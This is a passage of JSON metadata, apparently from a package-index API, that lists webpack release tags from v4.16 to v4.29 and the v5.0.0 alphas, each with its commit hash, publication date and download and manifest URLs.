.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste